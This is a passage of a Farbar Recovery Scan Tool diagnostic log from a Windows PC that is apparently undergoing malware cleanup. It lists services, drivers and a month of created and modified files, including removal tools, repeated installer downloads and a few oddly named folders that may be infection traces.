R2 hpqddsvc; C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll [135168 2008-10-16] (Hewlett-Packard Co.) [File not signed]
R2 HPSLPSVC; C:\Program Files\HP\Digital Imaging\bin\HPSLPSVC32.DLL [634880 2008-10-16] (Hewlett-Packard Co.) [File not signed]
S3 jswpsapi; C:\Program Files\NETGEAR\WNA1100\jswpsapi.exe [960992 2010-03-22] (Atheros Communications, Inc.)
R2 lxbl_device; C:\Windows\system32\lxblcoms.exe [537520 2007-04-20] ( )
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2008-07-18] (Hewlett-Packard) [File not signed]
S3 NisSrv; c:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [208944 2011-04-27] (Microsoft Corporation)
R2 PassThru Service; C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe [87040 2012-03-23] () [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2008-07-18] (Hewlett-Packard) [File not signed]
R2 WSWNA1100; C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe [266240 2010-08-04] () [File not signed]
S2 vToolbarUpdater; C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\9.0.1\ToolbarUpdater.exe [X]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 athur; C:\Windows\System32\DRIVERS\athur.sys [1439744 2010-10-10] (Atheros Communications, Inc.)
R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [147736 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [248656 2011-01-07] (AVG Technologies CZ, s.r.o.)
R1 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [34896 2011-03-01] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [32592 2011-03-16] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [297168 2011-04-05] (AVG Technologies CZ, s.r.o.)
R0 BootDefragDriver; C:\Windows\System32\drivers\BootDefragDriver.sys [16064 2014-07-18] (Glarysoft Ltd)
S3 gfiark; C:\Windows\System32\drivers\gfiark.sys [43368 2013-05-23] (ThreatTrack Security)
R1 GUBootStartup; C:\Windows\System32\drivers\GUBootStartup.sys [17216 2014-08-14] (Glarysoft Ltd)
R1 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [165648 2011-04-18] (Microsoft Corporation)
S3 MpNWMon; C:\Windows\System32\DRIVERS\MpNWMon.sys [43392 2011-04-18] (Microsoft Corporation)
R2 RtNdPt60; C:\Windows\System32\DRIVERS\RtNdPt60.sys [27648 2008-03-06] (Windows ® Codename Longhorn DDK provider)
R0 SCMNdisP; C:\Windows\System32\DRIVERS\scmndisp.sys [21728 2007-01-19] (Windows ® Codename Longhorn DDK provider)
S3 USBAAPL; C:\Windows\System32\Drivers\usbaapl.sys [42496 2011-08-02] (Apple, Inc.) [File not signed]
U5 AppMgmt; C:\Windows\system32\svchost.exe [21504 2008-01-20] (Microsoft Corporation)
S1 AVGIDSDriver; system32\DRIVERS\avgidsdriverx.sys [X]
S1 AVGIDSShim; system32\DRIVERS\avgidsshimx.sys [X]
R3 catchme; \??\C:\Users\SAVAS~1.KYR\AppData\Local\Temp\catchme.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S1 MpKslb9ee2848; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{BFB5F758-88DD-40A2-8570-9299F94880E8}\MpKslb9ee2848.sys [X]
S1 MpKslbb89cfa8; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{A306A4ED-0116-4B29-AE29-DC65EC41A044}\MpKslbb89cfa8.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S3 SWDUMon; system32\DRIVERS\SWDUMon.sys [X]
S3 TfNetMon; \??\C:\Windows\system32\drivers\TfNetMon.sys [X]
U3 mbr; \??\C:\ComboFix\mbr.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-25 11:10 - 2014-08-25 11:10 - 00043997 _____ () C:\ComboFix.txt
2014-08-25 10:53 - 2014-08-25 11:10 - 00000000 ____D () C:\ComboFix
2014-08-23 16:54 - 2014-08-25 13:41 - 00000000 ____D () C:\FRST
2014-08-23 16:30 - 2014-08-25 09:35 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-23 16:30 - 2014-08-25 08:26 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-23 16:30 - 2014-08-25 08:26 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-23 16:30 - 2014-08-25 08:26 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-23 16:30 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-08-23 16:30 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-08-23 16:30 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-08-23 12:25 - 2011-06-26 02:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-08-23 12:25 - 2010-11-07 13:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-08-23 12:25 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00098816 _____ () C:\Windows\sed.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00080412 _____ () C:\Windows\grep.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00068096 _____ () C:\Windows\zip.exe
2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt
2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt
2014-08-23 11:51 - 2014-08-23 11:53 - 00000000 ____D () C:\AdwCleaner
2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt
2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT
2014-08-22 17:06 - 2013-09-04 14:57 - 00024040 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiutil.sys
2014-08-22 17:06 - 2013-05-23 08:39 - 00043368 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiark.sys
2014-08-22 17:05 - 2014-08-22 21:40 - 00000000 ____D () C:\VIPRERESCUE
2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK
2014-08-22 16:12 - 2014-08-25 10:47 - 00040016 _____ () C:\Windows\PFRO.log
2014-08-22 15:52 - 2014-08-25 11:10 - 00000000 ____D () C:\Qoobox
2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps
2014-08-22 14:00 - 2014-08-23 16:48 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-08-22 13:41 - 2014-08-22 13:54 - 00000000 ____D () C:\Windows\dwrcs
2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development
2014-08-22 13:25 - 2014-08-25 13:39 - 00001564 _____ () C:\Windows\setupact.log
2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log
2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll
2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat
2014-08-20 18:12 - 2014-08-19 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy
2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft
2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe
2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe
2014-08-16 17:57 - 2014-08-17 17:23 - 00000000 ____D () C:\ProgramData\AVG2014
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 17:04 - 2014-08-16 17:05 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe
2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc
2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-15 20:57 - 2014-08-16 12:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-15 20:56 - 2014-08-16 09:22 - 00000000 ____D () C:\Program Files\DriverUpdate
2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers
2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe
2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe
2014-08-15 13:12 - 2014-08-15 13:13 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe
2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe
2014-08-15 13:04 - 2014-08-15 13:21 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe
2014-08-15 11:12 - 2014-08-15 11:13 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe
2014-08-15 11:11 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe
2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled
2014-08-14 18:20 - 2014-08-25 10:49 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job
2014-08-14 18:20 - 2014-08-20 23:44 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk
2014-08-14 18:20 - 2014-08-20 23:44 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk
2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys
2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5
2014-08-14 18:19 - 2014-08-25 10:49 - 00000000 ____D () C:\Program Files\Glary Utilities 5
2014-08-14 18:19 - 2014-08-23 11:16 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 18:19 - 2014-08-04 03:06 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe
2014-08-14 18:19 - 2014-07-18 03:11 - 00016064 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\BootDefragDriver.sys
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe
2014-08-14 18:15 - 2014-08-14 18:16 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe
2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe
2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe
2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe
2014-08-14 17:37 - 2014-08-14 17:40 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe
2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-08-13 21:28 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod
2014-08-13 20:51 - 2014-08-13 20:52 - 00000000 ____D () C:\Program Files\QuickTime
2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk
2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch
2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a495
2014-08-12 18:02 - 2014-08-22 16:10 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a495
2014-08-12 17:58 - 2014-08-15 03:47 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir
2014-08-12 16:53 - 2014-08-22 21:40 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu
2014-08-12 16:51 - 2014-08-25 09:16 - 00000000 ____D () C:\ProgramData\IrfuqApivh
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-25 13:41 - 2014-08-23 16:54 - 00000000 ____D () C:\FRST
2014-08-25 13:40 - 2006-11-02 06:33 - 00694332 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-08-25 13:39 - 2014-08-22 13:25 - 00001564 _____ () C:\Windows\setupact.log
2014-08-25 13:39 - 2014-07-18 00:39 - 01282029 _____ () C:\Windows\WindowsUpdate.log
2014-08-25 12:47 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-08-25 12:47 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-08-25 11:10 - 2014-08-25 11:10 - 00043997 _____ () C:\ComboFix.txt
2014-08-25 11:10 - 2014-08-25 10:53 - 00000000 ____D () C:\ComboFix
2014-08-25 11:10 - 2014-08-22 15:52 - 00000000 ____D () C:\Qoobox
2014-08-25 11:08 - 2006-11-02 06:23 - 00000215 _____ () C:\Windows\system.ini
2014-08-25 10:50 - 2011-12-22 18:52 - 00001356 _____ () C:\Users\savas.kyriakidis\AppData\Local\d3d9caps.dat
2014-08-25 10:49 - 2014-08-14 18:20 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job
2014-08-25 10:49 - 2014-08-14 18:19 - 00000000 ____D () C:\Program Files\Glary Utilities 5
2014-08-25 10:48 - 2008-08-06 12:35 - 00000276 _____ () C:\Windows\Tasks\RtlNICDiagVistaStart.job
2014-08-25 10:47 - 2014-08-22 16:12 - 00040016 _____ () C:\Windows\PFRO.log
2014-08-25 10:47 - 2006-11-02 09:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-08-25 10:46 - 2006-11-02 09:01 - 00032640 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-08-25 09:54 - 2011-03-06 00:06 - 00047104 _____ () C:\Users\savas.kyriakidis\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-08-25 09:35 - 2014-08-23 16:30 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-25 09:16 - 2014-08-12 16:51 - 00000000 ____D () C:\ProgramData\IrfuqApivh
2014-08-25 09:16 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\system
2014-08-25 08:26 - 2014-08-23 16:30 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-25 08:26 - 2014-08-23 16:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-25 08:26 - 2014-08-23 16:30 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-24 15:38 - 2011-12-29 11:34 - 00000000 ____D () C:\Windows\ERDNT
2014-08-23 16:48 - 2014-08-22 14:00 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-08-23 16:30 - 2011-03-14 18:46 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-08-23 14:45 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\schemas
2014-08-23 14:32 - 2011-03-14 18:43 - 00000000 ____D () C:\Windows\pss
2014-08-23 14:22 - 2006-11-02 07:18 - 00000000 ___RD () C:\Users\Public
2014-08-23 14:09 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis
2014-08-23 14:09 - 2011-02-10 21:08 - 00000000 ____D () C:\Users\Rita
2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt
2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt
2014-08-23 11:53 - 2014-08-23 11:51 - 00000000 ____D () C:\AdwCleaner
2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt
2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT
2014-08-23 11:16 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-22 21:40 - 2014-08-22 17:05 - 00000000 ____D () C:\VIPRERESCUE
2014-08-22 21:40 - 2014-08-12 16:53 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu
2014-08-22 17:13 - 2012-05-16 21:52 - 00000000 ____D () C:\temp
2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK
2014-08-22 16:10 - 2014-08-12 18:02 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a495
2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps
2014-08-22 14:15 - 2011-12-22 20:05 - 00000000 ____D () C:\ProgramData\AVAST Software
2014-08-22 13:54 - 2014-08-22 13:41 - 00000000 ____D () C:\Windows\dwrcs
2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development
2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log
2014-08-21 00:06 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Google
2014-08-20 23:44 - 2014-08-14 18:20 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk
2014-08-20 23:44 - 2014-08-14 18:20 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk
2014-08-20 23:39 - 2008-08-06 12:41 - 00000000 ____D () C:\Program Files\Google
2014-08-20 20:00 - 2009-06-10 23:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexmark Z700-P700 Series
2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll
2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat
2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy
2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft
2014-08-19 18:12 - 2014-08-20 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2014-08-17 17:23 - 2014-08-16 17:57 - 00000000 ____D () C:\ProgramData\AVG2014
2014-08-17 17:23 - 2011-07-10 20:09 - 00000000 ____D () C:\$AVG
2014-08-17 16:31 - 2011-07-10 19:21 - 00000000 ____D () C:\ProgramData\MFAData
2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe
2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe
2014-08-16 18:01 - 2011-07-10 19:25 - 00000000 ____D () C:\Program Files\AVG
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 17:05 - 2014-08-16 17:04 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe
2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc
2014-08-16 12:05 - 2014-08-15 20:57 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-16 10:06 - 2012-10-02 18:32 - 00000000 ____D () C:\Program Files\HTC
2014-08-16 09:27 - 2008-08-06 12:49 - 00000000 ____D () C:\Program Files\Citrix
2014-08-16 09:22 - 2014-08-15 20:56 - 00000000 ____D () C:\Program Files\DriverUpdate
2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers
2014-08-15 20:41 - 2012-10-02 18:45 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Htc
2014-08-15 19:55 - 2008-08-06 12:37 - 00000000 ____D () C:\Program Files\Microsoft Office
2014-08-15 17:56 - 2006-11-02 08:47 - 00267048 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe
2014-08-15 13:26 - 2011-06-17 17:39 - 00058896 _____ () C:\Windows\system32\GDIPFONTCACHEV1.DAT
2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe
2014-08-15 13:21 - 2014-08-15 13:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-15 13:13 - 2014-08-15 13:12 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe
2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe
2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe
2014-08-15 13:01 - 2012-01-24 17:09 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\LogMeIn Rescue Applet
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe
2014-08-15 11:13 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe
2014-08-15 11:12 - 2014-08-15 11:11 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe
2014-08-15 03:47 - 2014-08-12 17:58 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir
2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled
2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys
2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5
2014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe
2014-08-14 18:16 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe
2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe
2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe
2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe
2014-08-14 17:40 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe
2014-08-13 23:07 - 2013-06-10 19:17 - 00002463 _____ () C:\Users\Public\Desktop\Transporter.lnk
2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-08-13 21:31 - 2014-08-13 21:28 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-13 21:31 - 2011-12-24 11:26 - 00000000 ____D () C:\Program Files\iTunes
2014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod
2014-08-13 21:28 - 2008-09-02 12:28 - 00000000 ____D () C:\Program Files\Common Files\Apple
2014-08-13 21:02 - 2008-09-02 12:28 - 00000000 ____D () C:\ProgramData\Apple
